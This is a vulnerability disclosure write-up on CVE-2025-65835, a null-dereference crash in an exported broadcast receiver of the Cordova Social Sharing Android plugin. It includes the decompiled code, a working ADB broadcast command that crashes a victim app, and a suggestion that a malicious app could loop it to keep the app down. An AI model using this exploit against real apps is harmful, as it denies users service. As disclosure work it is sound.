> This vulnerability is now tracked as [CVE-2025-65835](https://nvd.nist.gov/vuln/detail/CVE-2025-65835) During an engagement against an Android application, I discovered a local denial-of-service (DoS) vulnerability in the latest version (6.0.4) of [Cordova Social Sharing plugin](https://github.com/EddyVerbruggen/SocialSharing-PhoneGap-Plugin). The testing device used was a rooted Android 12 (API 31) emulator. # Vulnerable Component The plugin registered an exported broadcast receiver — `nl.xservices.plugins.ShareChooserPendingIntent` — which accepted `android.intent.action.SEND` intents from any application on the same device. It also de-referenced an optional intent extra without a null check, allowing a malicious local application to repeatedly crash any app that includes the vulnerable plugin. The following snippet is from the `AndroidManifest.xml` of an affected application that is using the vulnerable plugin: ```json <activity android:exported="true" android:name="de.niklasmerz.cordova.biometric.BiometricActivity" android:theme="@style/TransparentTheme"/> <receiver android:enabled="true" android:exported="true" android:name="nl.xservices.plugins.ShareChooserPendingIntent"> <intent-filter> <action android:name="android.intent.action.SEND"/> </intent-filter> </receiver> ``` Initially I tested the exported activity first — `BiometricActivity`—then the receiver. It was only after I had written up both vulnerable components did I discover that the `BiometricActivity` DoS attack vector is publicly known and tracked as [CVE-2021–43849](https://www.cve.org/CVERecord?id=CVE-2021-43849) which prompted me to look closer into the `ShareChooserPendingIntent` receiver. ## Analysis of ShareChooserPendingIntent The receiver was registered as follows in the generated manifest: ```json <receiver android:enabled="true" android:exported="true" android:name="nl.xservices.plugins.ShareChooserPendingIntent"> <intent-filter> <action android:name="android.intent.action.SEND" /> </intent-filter> </receiver> ``` - `android:exported="true"` makes the receiver globally reachable to other apps. - The `android.intent.action.SEND` intent-filter is generic and commonly used for standard sharing flows. Ultimately, this means that `ShareChooserPendingIntent` is a `BroadcastReceiver` used as part of the share chooser workflow. The decompiled smali code of `ShareChooserPendingIntent.smali` shows an `onReceive` implementation that can be reconstructed as: ```java public class ShareChooserPendingIntent extends BroadcastReceiver { public static String chosenComponent = null; @Override public void onReceive(Context context, Intent intent) { if (intent.getExtras() != null) { chosenComponent = intent.getExtras() .get(Intent.EXTRA_CHOSEN_COMPONENT) .toString(); } } } ``` The `ShareChooserPendingIntent` receiver reads `Intent.EXTRA_CHOSEN_COMPONENT` from the intent extras and immediately calls `.toString()` on the returned value without checking for null. If the intent contains any extras but does not include `EXTRA_CHOSEN_COMPONENT`, the lookup returns null and the call to `.toString()` causes a `NullPointerException`, crashing the app. Because the receiver is exported and registered for the generic `android.intent.action.SEND` action, any third-party application can send a crafted broadcast that simply omits this extra and reliably triggers the crash resulting in a local denial-of-service condition. ## Exploitation An application installed on the same device can craft an explicit broadcast targeting the exported receiver in a victim app that uses `cordova-plugin-x-socialsharing`. This exploit does not require special permissions or user interaction. Assuming the victim app’s package name is `com.example.victim`, the vulnerability can be demonstrated using Android Debug Bridge (ADB) as follows: ```shell adb shell am broadcast \ -a android.intent.action.SEND \ -n com.example.victim/nl.xservices.plugins.ShareChooserPendingIntent \ --es test "gr3mlin" ``` This command does the following: - Sends a broadcast with action `android.intent.action.SEND` - Targets `nl.xservices.plugins.ShareChooserPendingIntent` inside the victim app - Adds at least one arbitrary extra (`gr3mlin`), ensuring `getExtras()` is non-null - Does not supply `Intent.EXTRA_CHOSEN_COMPONENT` On a vulnerable build, this results in a crash similar to: ``` java.lang.RuntimeException: Unable to start receiver nl.xservices.plugins.ShareChooserPendingIntent: java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String java.lang.Object.toString()' on a null object reference at nl.xservices.plugins.ShareChooserPendingIntent.onReceive(ShareChooserPendingIntent.java:13) ``` A malicious application can invoke the same broadcast programmatically, for example in a loop, to keep the victim application in a crash/restart cycle, effectively denying service to the user. ## Impact The vulnerability allows a local attacker (another app on the same device) to cause a deterministic denial of service against any Android application embedding `cordova-plugin-x-socialsharing` with the default `ShareChooserPendingIntent` registration.